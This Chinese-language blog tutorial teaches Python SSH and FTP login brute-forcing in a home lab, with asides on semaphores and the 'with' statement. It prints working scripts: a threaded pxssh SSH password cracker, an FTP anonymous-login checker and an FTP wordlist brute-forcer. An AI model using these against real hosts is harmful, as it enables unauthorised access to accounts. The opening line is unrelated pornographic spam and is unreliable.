欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Python中FTP服務(wù)與SSH登錄暴力破解的實(shí)現(xiàn)

 更新時(shí)間:2021年08月10日 11:26:05   作者:Tr0e  
本文學(xué)習(xí)了如何通過(guò) Python 腳本進(jìn)行 FTP、SSH 服務(wù)的登錄爆破,文中通過(guò)示例代碼介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下

前言

本文繼續(xù)學(xué)習(xí)下 Python 編程在網(wǎng)絡(luò)攻防領(lǐng)域的應(yīng)用,主要是通過(guò) Python 腳本進(jìn)行 SSH 登錄爆破和 FTP 服務(wù)登錄爆破。

SSH爆破

演示環(huán)境借助 Kali 虛擬機(jī)進(jìn)行自身的 SSH 服務(wù)的登錄爆破,注意提前修改/etc/ssh/sshd_config配置文件并執(zhí)行命令service ssh start運(yùn)行 SSH 服務(wù)。

腳本演示

先來(lái)看看代碼:

from pexpect import pxssh
import argparse
import threading
import sys

maxConnetions = 5
connect_lock = threading.BoundedSemaphore(value=maxConnetions)


def connect(host, user, password):
    try:
        s = pxssh.pxssh()
        # 登錄ssh測(cè)試
        s.login(host, user, password)
        print("[+] Password Found: {}".format(password))
        sys.exit(0)
    except pxssh.ExceptionPxssh as e:
        pass


def main():
    # 定義腳本的運(yùn)行參數(shù)、獲取用戶輸入的對(duì)應(yīng)參數(shù)值
    parser = argparse.ArgumentParser()
    parser.add_argument('-H', dest='Host', help="like: 192.168.3.1")
    parser.add_argument('-F', dest='passwdFile', help="like: /root/pass.txt")
    parser.add_argument('-u', dest='user')
    args = parser.parse_args()
    host = args.Host
    passwdFile = args.passwdFile
    user = args.user
    # 讀取字典文件、使用多線程進(jìn)行口令爆破
    with open(passwdFile, 'r') as f:
        for line in f.readlines():
            with connect_lock:
                password = line.strip('\n')
                print("[-] Testing: {}".format(password))
                # 起線程每個(gè)密碼嘗試登錄一次
                t = threading.Thread(target=connect, args=(host, user, password))
                t.start()

main()

在 Kali 終端運(yùn)行,運(yùn)行腳本可使用 -h 參數(shù)獲得提示,效果如下:

在這里插入圖片描述

最終暴力破解獲得密碼 root:

在這里插入圖片描述

上述腳本開啟 5 個(gè)線程連接,開啟線程速度會(huì)更快是因?yàn)檫@里要遠(yuǎn)程連接,等待網(wǎng)絡(luò)有阻塞,故開啟多線程可以加快速度(實(shí)際上多線程是一個(gè) CPU 在交替運(yùn)行)。

信號(hào)量類

注意到代碼中使用threading.BoundedSemaphore(value=maxConnetions)來(lái)控制最大線程數(shù)量,下面來(lái)學(xué)習(xí)下相關(guān)語(yǔ)法知識(shí)。

Python 的 threading 線程模塊中的 Semaphore 類和 BoundedSemaphore 類來(lái)實(shí)現(xiàn)并發(fā)限制。

  • Semaphore 類和 BoundedSemaphore 類都是信號(hào)量類,每次有線程獲得信號(hào)量(即 acquire() )的時(shí)候計(jì)數(shù)器 -1,釋放信號(hào)量(release())時(shí)候計(jì)數(shù)器+1,計(jì)數(shù)器為 0 的時(shí)候其它線程就被阻塞無(wú)法獲得信號(hào)量;
  • 當(dāng)計(jì)數(shù)器為設(shè)定好的上限的時(shí)候 BoundedSemaphore 就無(wú)法進(jìn)行 release() 操作了,而 Semaphore 沒有這個(gè)限制檢查。

下面直接通過(guò)這兩個(gè)類的簡(jiǎn)單示例來(lái)學(xué)習(xí)理解下這兩個(gè)類在線程控制中的意義。

1、首先看看 Semaphore 類:

# coding: utf-8
import threading
import time


def fun(semaphore, num):
    # 獲得信號(hào)量,信號(hào)量減一
    semaphore.acquire()
    print("Thread %d is running." % num)
    time.sleep(3)
    # 釋放信號(hào)量,信號(hào)量加一
    semaphore.release()


if __name__=='__main__':
    # 初始化信號(hào)量,數(shù)量為2
    semaphore = threading.Semaphore(2)
    # 運(yùn)行4個(gè)線程
    for num in range(4):
        t = threading.Thread(target=fun, args=(semaphore, num))
        t.start()

代碼運(yùn)行效果:

在這里插入圖片描述

可以注意到線程 0 和 1 是一起打印出消息的,而線程 2 和 3 是在 3 秒后打印的,可以得出每次只有 2 個(gè)線程獲得信號(hào)量,進(jìn)行打印。

2、接下來(lái)看看 BoundedSemaphore 類:

# encoding: UTF-8
import threading
import time

def showfun(n):
    print("%s start -- %d"%(time.ctime(),n))
    print("working")
    time.sleep(2)
    print("%s end -- %d" % (time.ctime(), n))
    semlock.release()

if __name__ == '__main__':
    maxconnections = 5
    semlock = threading.BoundedSemaphore(maxconnections)
    list=[]
    for i in range(8):
        semlock.acquire()
        t=threading.Thread(target=showfun, args=(i,))
        list.append(t)
        t.start()

看看代碼運(yùn)行效果:

Sun Aug 8 18:59:37 2021 start -- 0
working
Sun Aug 8 18:59:37 2021 start -- 1
working
Sun Aug 8 18:59:37 2021 start -- 2
working
Sun Aug 8 18:59:37 2021 start -- 3
working
Sun Aug 8 18:59:37 2021 start -- 4
working
Sun Aug 8 18:59:39 2021 end -- 0
Sun Aug 8 18:59:39 2021 end -- 1
Sun Aug 8 18:59:39 2021 end -- 2
Sun Aug 8 18:59:39 2021 end -- 3
Sun Aug 8 18:59:39 2021 end -- 4
Sun Aug 8 18:59:39 2021 start -- 5
working
Sun Aug 8 18:59:39 2021 start -- 6
working
Sun Aug 8 18:59:39 2021 start -- 7
working
Sun Aug 8 18:59:41 2021 end -- 5
Sun Aug 8 18:59:41 2021 end -- 6
Sun Aug 8 18:59:41 2021 end -- 7

線程數(shù)限制到 5 個(gè),因此等待 0-4 完畢之后 5-7 才能請(qǐng)求到資源進(jìn)行執(zhí)行。

with 用法

上面代碼中注意到還使用了with connect_lock:語(yǔ)句進(jìn)行信號(hào)量的管理,故來(lái)學(xué)習(xí)下 with 關(guān)鍵詞的使用。在 Python 中,with 語(yǔ)句適用于對(duì)資源進(jìn)行訪問的場(chǎng)合,確保不管使用過(guò)程中是否發(fā)生異常都會(huì)執(zhí)行必要的“清理”操作,釋放資源,比如文件使用后自動(dòng)關(guān)閉/線程中鎖的自動(dòng)獲取和釋放等。

1、問題引出

如下代碼:

file = open("1.txt")
data = file.read()
file.close()

上面代碼存在2個(gè)問題:

  • 文件讀取發(fā)生異常,但沒有進(jìn)行任何處理;
  • 可能忘記關(guān)閉文件句柄;

2、代碼改進(jìn)

try:
    f = open('xxx')
except:
    print('fail to open')
    exit(-1)
try:
    do something
except:
    do something
finally:
    f.close()

雖然這段代碼運(yùn)行良好,但比較冗長(zhǎng)。而使用 with 的話,能夠減少冗長(zhǎng),還能自動(dòng)處理上下文環(huán)境產(chǎn)生的異常,如下面代碼:

with open("1.txt") as file:
    data = file.read()

3、with 工作原理

  • 緊跟 with 后面的語(yǔ)句被求值后,返回對(duì)象的 “–enter–()” 方法被調(diào)用,這個(gè)方法的返回值將被賦值給 as 后面的變量;
  • 當(dāng)with后面的代碼塊全部被執(zhí)行完之后,將調(diào)用前面返回對(duì)象的 “–exit–()” 方法。

with 工作原理代碼示例:

class Sample:
    def __enter__(self):
        print "in __enter__"
        return "Foo"
    def __exit__(self, exc_type, exc_val, exc_tb):
        print "in __exit__"
def get_sample():
    return Sample()
with get_sample() as sample:
    print "Sample: ", sample

代碼的運(yùn)行結(jié)果如下:

in __enter__
Sample: Foo
in __exit__

4、with 作用小結(jié)

with 看起來(lái)如此簡(jiǎn)單,但是其背后還有一些工作要做,因?yàn)槟悴荒軐?duì) python 的任意對(duì)象使用 with,它僅能工作于支持上下文管理協(xié)議的對(duì)象。只有內(nèi)建了“上下文管理”的對(duì)象可以和 with 一起工作,目前支持該協(xié)議的對(duì)象有:

file
decimal.Context
thread.LockType
threading.Lock
threading.RLock
threading.Condition
threading.Semaphore
threading.BoundedSemaphore

因?yàn)樯舷挛墓芾砥髦饕饔糜诠蚕碣Y源,__enter__()__exit__()方法干的基本是需要分配和釋放資源的低層次工作,比如數(shù)據(jù)庫(kù)連接、鎖分配、信號(hào)量加/減、狀態(tài)管理、文件打開和關(guān)閉、異常處理等。

FTP爆破

FTP(File Transfer Protocol)即文件傳輸協(xié)議,是一種基于 TCP 的協(xié)議,采用客戶/服務(wù)器模式。通過(guò) FTP 協(xié)議,用戶可以在FTP服務(wù)器中進(jìn)行文件的上傳或下載等操作。雖然現(xiàn)在通過(guò) HTTP 協(xié)議下載的站點(diǎn)有很多,但是由于FTP協(xié)議可以很好地控制用戶數(shù)量和寬帶的分配,快速方便地上傳、下載文件,因此FTP已成為網(wǎng)絡(luò)中文件上傳和下載的首選服務(wù)器。

服務(wù)搭建

下面演示在 Win10 虛擬機(jī)搭建 FTP 服務(wù)。

1、打開的【W(wǎng)indows功能】,將 Internet 信息服務(wù)的 4 個(gè)子功能打勾“√”,然后點(diǎn)擊【確定】按鈕安裝這些功能,圖示如下:

在這里插入圖片描述

2、在系統(tǒng)安裝配置完成后,打開 IIS 管理器,點(diǎn)擊【添加FTP站點(diǎn)】,圖示如下:

在這里插入圖片描述3、

輸入 FTP 站點(diǎn)名稱,以及允許用戶訪問的目錄路徑,圖示如下:

在這里插入圖片描述

4、在【綁定】IP 中輸入你本機(jī)的 IP 地址,選擇“無(wú)SSL”,圖示如下:

在這里插入圖片描述

5、身份驗(yàn)證選擇“基本”,指定 Win10 的用戶 True 可登錄,完成配置:

在這里插入圖片描述

6、物理機(jī)瀏覽器輸入 ftp://win10虛擬機(jī)ip,即可訪問創(chuàng)建的 ftp 服務(wù),需要輸入賬戶密碼:

在這里插入圖片描述

7、驗(yàn)證完賬戶密碼,即可看到 FTP 服務(wù)的目錄:

在這里插入圖片描述

點(diǎn)擊查看具體文件內(nèi)容:

在這里插入圖片描述

以上便在局域網(wǎng)內(nèi)部的 Win10 虛擬機(jī)搭建了 FTP 服務(wù),并指定了登錄用戶為 True。

補(bǔ)充一個(gè)概念:匿名FTP服務(wù)

匿名 FTP 是這樣一種機(jī)制:用戶可通過(guò)它連接到遠(yuǎn)程主機(jī)上,并從其下載文件,而無(wú)需成為其注冊(cè)用戶。系統(tǒng)管理員建立了一個(gè)特殊的用戶 ID,名為anonymous, Internet 上的任何人在任何地方都可使用該用戶 ID。

通過(guò) FTP 程序連接匿名 FTP 主機(jī)的方式同連接普通 FTP 主機(jī)的方式差不多,只是在要求提供用戶標(biāo)識(shí) ID 時(shí)必須輸入anonymous,該用戶 ID 的口令可以是任意的字符串。習(xí)慣上,用自己的 E-mail 地址作為口令,使系統(tǒng)維護(hù)程序能夠記錄下來(lái)誰(shuí)在存取這些文件。

匿名掃描

下面先來(lái)演示下借助腳本測(cè)試 FTP 服務(wù)器是否啟用匿名登錄:

# coding=utf-8
import ftplib


def ftpLogin(hostname):
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', 'Tr0e@123.com')
        print('[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.')
        ftp.quit()
        exit(0)
    except Exception as e:
        print('[-] FTP Anonymous Logon Failed.',e)


if __name__ == "__main__":
    ftpLogin("192.168.66.101")

代碼運(yùn)行結(jié)果,可見當(dāng)前 FTP 服務(wù)器并不支持匿名登錄:

在這里插入圖片描述

可更改 Win10 虛擬機(jī)的 FTP 服務(wù)配置,啟用匿名登錄:

在這里插入圖片描述

暴力破解

下面來(lái)對(duì) FTP 服務(wù)的 True 賬戶的密碼進(jìn)行暴力破解:

# coding=utf-8
import ftplib


def BruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        username = line.split(':')[0]
        password = line.split(':')[1].strip('\r').strip('\n')
        print('[+] Trying: ' + username + '/' + password)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(username, password)
            print('[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password)
            ftp.quit()
            exit(0)
        except Exception as e:
            pass
    print('[-] Could not brubrute force FTP credentials.')
    exit(0)


if __name__=="__main__":
    BruteLogin("192.168.66.101", "pwd.txt")

代碼運(yùn)行效果如下:

在這里插入圖片描述

其中密碼字典如下:

在這里插入圖片描述

總結(jié)

本文學(xué)習(xí)了如何通過(guò) Python 腳本進(jìn)行 FTP、SSH 服務(wù)的登錄爆破,雖然 Kali 自帶了類似的工具,但是主要目的還是鍛煉 Python 編程能力和學(xué)習(xí) Python 編程應(yīng)用。后續(xù)還會(huì)繼續(xù)學(xué)習(xí) Python 更多的網(wǎng)絡(luò)攻防應(yīng)用場(chǎng)景!

到此這篇關(guān)于Python中FTP服務(wù)與SSH登錄暴力破解的實(shí)現(xiàn)的文章就介紹到這了,更多相關(guān)Python 暴力破解 內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • python抓取多種類型的頁(yè)面方法實(shí)例

    python抓取多種類型的頁(yè)面方法實(shí)例

    在本篇文章里小編給大家整理的是關(guān)于python抓取多種類型的頁(yè)面方法實(shí)例內(nèi)容,有需要的朋友們可以學(xué)習(xí)下。
    2019-11-11
  • python如何通過(guò)正則匹配指定字符開頭與結(jié)束提取中間內(nèi)容

    python如何通過(guò)正則匹配指定字符開頭與結(jié)束提取中間內(nèi)容

    這篇文章主要介紹了python通過(guò)正則匹配指定字符開頭與結(jié)束提取中間內(nèi)容的操作方法,本文結(jié)合實(shí)例代碼給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2023-02-02
  • Python+OpenCV實(shí)現(xiàn)六種常用圖像特效

    Python+OpenCV實(shí)現(xiàn)六種常用圖像特效

    這篇文章主要為大家介紹了用Python和OpenCV實(shí)現(xiàn)的六種常見圖像特效:圖像融合、灰度處理、馬賽克效果、浮雕效果、毛玻璃效果和顏色反轉(zhuǎn),需要的可以參考一下
    2022-05-05
  • 通過(guò)代碼實(shí)例了解Python sys模塊

    通過(guò)代碼實(shí)例了解Python sys模塊

    這篇文章主要介紹了通過(guò)代碼實(shí)例了解Python sys模塊,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友可以參考下
    2020-09-09
  • VPS CENTOS 上配置python,mysql,nginx,uwsgi,django的方法詳解

    VPS CENTOS 上配置python,mysql,nginx,uwsgi,django的方法詳解

    這篇文章主要介紹了VPS CENTOS 上配置python,mysql,nginx,uwsgi,django的方法,較為詳細(xì)的分析了VPS CENTOS 上配置python,mysql,nginx,uwsgi,django的具體步驟、相關(guān)命令與操作注意事項(xiàng),需要的朋友可以參考下
    2019-07-07
  • Python制作基礎(chǔ)學(xué)生信息管理系統(tǒng)

    Python制作基礎(chǔ)學(xué)生信息管理系統(tǒng)

    本文詳細(xì)講解了Python制作基礎(chǔ)學(xué)生信息管理系統(tǒng)的實(shí)現(xiàn),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2021-12-12
  • Python 通過(guò)調(diào)用接口獲取公交信息的實(shí)例

    Python 通過(guò)調(diào)用接口獲取公交信息的實(shí)例

    今天小編就為大家分享一篇Python 通過(guò)調(diào)用接口獲取公交信息的實(shí)例,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧
    2018-12-12
  • Python 3 使用Pillow生成漂亮的分形樹圖片

    Python 3 使用Pillow生成漂亮的分形樹圖片

    這篇文章主要介紹了Python 3 使用Pillow生成漂亮的分形樹圖片,本文通過(guò)實(shí)例代碼介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2019-12-12
  • Python基礎(chǔ)語(yǔ)法之容器詳解

    Python基礎(chǔ)語(yǔ)法之容器詳解

    這篇文章主要介紹了Python基礎(chǔ)語(yǔ)法之容器的相關(guān)資料,幫助大家更好的理解和學(xué)習(xí)python,感興趣的朋友可以了解下,希望能夠給你帶來(lái)幫助
    2021-09-09
  • Linux下python與C++使用dlib實(shí)現(xiàn)人臉檢測(cè)

    Linux下python與C++使用dlib實(shí)現(xiàn)人臉檢測(cè)

    這篇文章主要為大家詳細(xì)介紹了Linux下python與C++使用dlib實(shí)現(xiàn)人臉檢測(cè),具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2018-06-06

最新評(píng)論